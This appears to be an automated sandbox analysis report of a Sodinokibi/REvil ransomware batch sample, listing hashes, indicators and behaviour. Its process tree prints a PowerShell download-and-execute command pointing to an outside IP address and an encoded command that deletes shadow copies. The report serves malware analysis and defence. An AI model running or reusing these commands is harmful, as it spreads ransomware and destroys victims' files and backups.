Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10_x64 -
resource
win10 -
submitted
14-08-2020 13:10
Static task
static1
Behavioral task
behavioral1
Sample
02e935713bd82b8d92596478da846147.bat
Resource
win7
Behavioral task
behavioral2
Sample
02e935713bd82b8d92596478da846147.bat
Resource
win10
General
-
Target
02e935713bd82b8d92596478da846147.bat
-
Size
222B
-
MD5
709373b57a3c4758065b1f72f1a19b2d
-
SHA1
b820438ee7bcc43e84373b68f9fec3bedc10c25a
-
SHA256
ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838
-
SHA512
d5061ac40ed9258dcb412dcf5eb05fe716affcd44a388b81b9b89e29317f51138fc8e7a13d1f195a5d3647736aea67c66a1d73fb4cff70406851cd2c29f1816f
Malware Config
Extracted
http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147
Extracted
C:\69j456788-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A3AEEB525E171025
http://decryptor.cc/A3AEEB525E171025
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 62 IoCs
Processes:
powershell.exeflow pid process 3 3052 powershell.exe 5 3052 powershell.exe 16 3052 powershell.exe 19 3052 powershell.exe 20 3052 powershell.exe 22 3052 powershell.exe 24 3052 powershell.exe 26 3052 powershell.exe 28 3052 powershell.exe 30 3052 powershell.exe 32 3052 powershell.exe 34 3052 powershell.exe 36 3052 powershell.exe 38 3052 powershell.exe 40 3052 powershell.exe 42 3052 powershell.exe 44 3052 powershell.exe 48 3052 powershell.exe 50 3052 powershell.exe 51 3052 powershell.exe 52 3052 powershell.exe 55 3052 powershell.exe 57 3052 powershell.exe 59 3052 powershell.exe 61 3052 powershell.exe 63 3052 powershell.exe 65 3052 powershell.exe 67 3052 powershell.exe 69 3052 powershell.exe 71 3052 powershell.exe 73 3052 powershell.exe 76 3052 powershell.exe 78 3052 powershell.exe 80 3052 powershell.exe 82 3052 powershell.exe 84 3052 powershell.exe 86 3052 powershell.exe 88 3052 powershell.exe 90 3052 powershell.exe 91 3052 powershell.exe 93 3052 powershell.exe 95 3052 powershell.exe 97 3052 powershell.exe 99 3052 powershell.exe 101 3052 powershell.exe 103 3052 powershell.exe 105 3052 powershell.exe 107 3052 powershell.exe 109 3052 powershell.exe 111 3052 powershell.exe 113 3052 powershell.exe 115 3052 powershell.exe 117 3052 powershell.exe 119 3052 powershell.exe 121 3052 powershell.exe 123 3052 powershell.exe 125 3052 powershell.exe 127 3052 powershell.exe 129 3052 powershell.exe 131 3052 powershell.exe 133 3052 powershell.exe 135 3052 powershell.exe -
Modifies extensions of user files 9 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File renamed C:\Users\Admin\Pictures\DismountResume.crw => \??\c:\users\admin\pictures\DismountResume.crw.69j456788 powershell.exe File renamed C:\Users\Admin\Pictures\SuspendRename.png => \??\c:\users\admin\pictures\SuspendRename.png.69j456788 powershell.exe File renamed C:\Users\Admin\Pictures\UnblockLimit.tiff => \??\c:\users\admin\pictures\UnblockLimit.tiff.69j456788 powershell.exe File renamed C:\Users\Admin\Pictures\SwitchConnect.tiff => \??\c:\users\admin\pictures\SwitchConnect.tiff.69j456788 powershell.exe File opened for modification \??\c:\users\admin\pictures\UnblockLimit.tiff powershell.exe File renamed C:\Users\Admin\Pictures\CheckpointUnblock.tif => \??\c:\users\admin\pictures\CheckpointUnblock.tif.69j456788 powershell.exe File renamed C:\Users\Admin\Pictures\ConfirmRegister.png => \??\c:\users\admin\pictures\ConfirmRegister.png.69j456788 powershell.exe File opened for modification \??\c:\users\admin\pictures\SwitchConnect.tiff powershell.exe File renamed C:\Users\Admin\Pictures\InitializeSkip.tif => \??\c:\users\admin\pictures\InitializeSkip.tif.69j456788 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z9e8e97kvto.bmp" powershell.exe -
Drops file in Program Files directory 35 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\TestFind.bmp powershell.exe File opened for modification \??\c:\program files\ReadMove.pdf powershell.exe File opened for modification \??\c:\program files\ReceiveDismount.avi powershell.exe File opened for modification \??\c:\program files\SyncConvertTo.xhtml powershell.exe File opened for modification \??\c:\program files\InstallSend.mp3 powershell.exe File opened for modification \??\c:\program files\CompleteInitialize.mht powershell.exe File opened for modification \??\c:\program files\PushImport.M2TS powershell.exe File opened for modification \??\c:\program files\ReceiveDeny.emz powershell.exe File created \??\c:\program files (x86)\69j456788-readme.txt powershell.exe File opened for modification \??\c:\program files\GroupGet.scf powershell.exe File opened for modification \??\c:\program files\InitializeCompress.png powershell.exe File opened for modification \??\c:\program files\CopyUnprotect.scf powershell.exe File opened for modification \??\c:\program files\RevokeExpand.xsl powershell.exe File opened for modification \??\c:\program files\SendSet.WTV powershell.exe File opened for modification \??\c:\program files\SkipExpand.vssx powershell.exe File opened for modification \??\c:\program files\SuspendCompress.AAC powershell.exe File opened for modification \??\c:\program files\UnprotectReceive.potm powershell.exe File opened for modification \??\c:\program files\InitializeStep.xsl powershell.exe File opened for modification \??\c:\program files\LimitGroup.ex_ powershell.exe File opened for modification \??\c:\program files\SearchCompress.DVR-MS powershell.exe File opened for modification \??\c:\program files\UnpublishClose.wps powershell.exe File opened for modification \??\c:\program files\EnableDebug.3gp powershell.exe File opened for modification \??\c:\program files\DenyWatch.shtml powershell.exe File opened for modification \??\c:\program files\DisconnectConvertTo.png powershell.exe File opened for modification \??\c:\program files\ExpandConfirm.ex_ powershell.exe File opened for modification \??\c:\program files\FormatSkip.ini powershell.exe File opened for modification \??\c:\program files\ImportOut.zip powershell.exe File opened for modification \??\c:\program files\NewSplit.mov powershell.exe File opened for modification \??\c:\program files\PopRedo.m4v powershell.exe File created \??\c:\program files\69j456788-readme.txt powershell.exe File opened for modification \??\c:\program files\AssertPush.xps powershell.exe File opened for modification \??\c:\program files\BlockLimit.ADTS powershell.exe File opened for modification \??\c:\program files\CompressAssert.mhtml powershell.exe File opened for modification \??\c:\program files\SplitResize.xml powershell.exe File opened for modification \??\c:\program files\AddNew.001 powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepid process 3052 powershell.exe 3052 powershell.exe 3052 powershell.exe 3052 powershell.exe 3052 powershell.exe 3184 powershell.exe 3184 powershell.exe 3184 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3052 powershell.exe Token: SeDebugPrivilege 3184 powershell.exe Token: SeBackupPrivilege 1144 vssvc.exe Token: SeRestorePrivilege 1144 vssvc.exe Token: SeAuditPrivilege 1144 vssvc.exe Token: SeTakeOwnershipPrivilege 3052 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1908 wrote to memory of 3052 1908 cmd.exe powershell.exe PID 1908 wrote to memory of 3052 1908 cmd.exe powershell.exe PID 1908 wrote to memory of 3052 1908 cmd.exe powershell.exe PID 3052 wrote to memory of 3184 3052 powershell.exe powershell.exe PID 3052 wrote to memory of 3184 3052 powershell.exe powershell.exe PID 3052 wrote to memory of 3184 3052 powershell.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\02e935713bd82b8d92596478da846147.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147');Invoke-WIWBLXHVRXNAAOB;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3184
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1144